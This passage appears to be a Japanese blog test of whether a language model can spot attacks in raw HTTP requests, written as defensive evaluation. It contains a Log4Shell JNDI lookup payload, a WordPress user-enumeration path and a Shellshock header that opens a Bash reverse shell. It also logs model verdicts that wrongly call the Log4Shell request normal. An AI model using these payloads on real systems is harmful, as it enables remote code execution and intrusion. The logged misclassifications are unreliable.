SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONTENT-LENGTH: 101
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2Fa%7D&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this is not a cyber attack. This is an HTTP request for a web page.
POSTパラメータ & ヘッダ無し
POST:${jndi:ldap://127.0.0.1:1389/a}
2.68 秒
検出なし
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
msg=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2Fa%7D&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this is not a cyber attack. It appears to be a normal HTTP request.
特定プロダクトに対する攻撃の検出には困難している模様。
POSTパラメータ & ヘッダ無し
さらにノイズをなくすためにCSRFトークンも削除してみる。
POST:${jndi:ldap://127.0.0.1:1389/a}
POSTパラメータからCSRFトークンを削除
?秒
検出あり
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
p=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2Fa%7D
Yes, this is a cyber attack. The request is attempting to exploit a JNDI injection vulnerability.
やっと検出されました。
WordPress のユーザ列挙
パス:/wp-json/wp/v2/users
6.49 秒
検出なし
[2023-02-21 13:03:48] local.INFO: Is the following HTTP request a cyber attack?
-----
GET /wp-json/wp/v2/users HTTP/1.1
No, this is not a cyber attack. It is a legitimate HTTP request for a web page.
Is the following HTTP request a cyber attack?
-----
GET /cgi-bin/test.cgi HTTP/1.1
ACCEPT: */*
USER-AGENT: () { :;};/bin/bash -i >& /dev/tcp/127.0.0.1/3333 0>&1
HOST: 127.0.0.1
Yes, this HTTP request is a cyber attack. It is an example of a Shellshock attack,
which is a type of attack that takes advantage of a vulnerability in the Bash shell.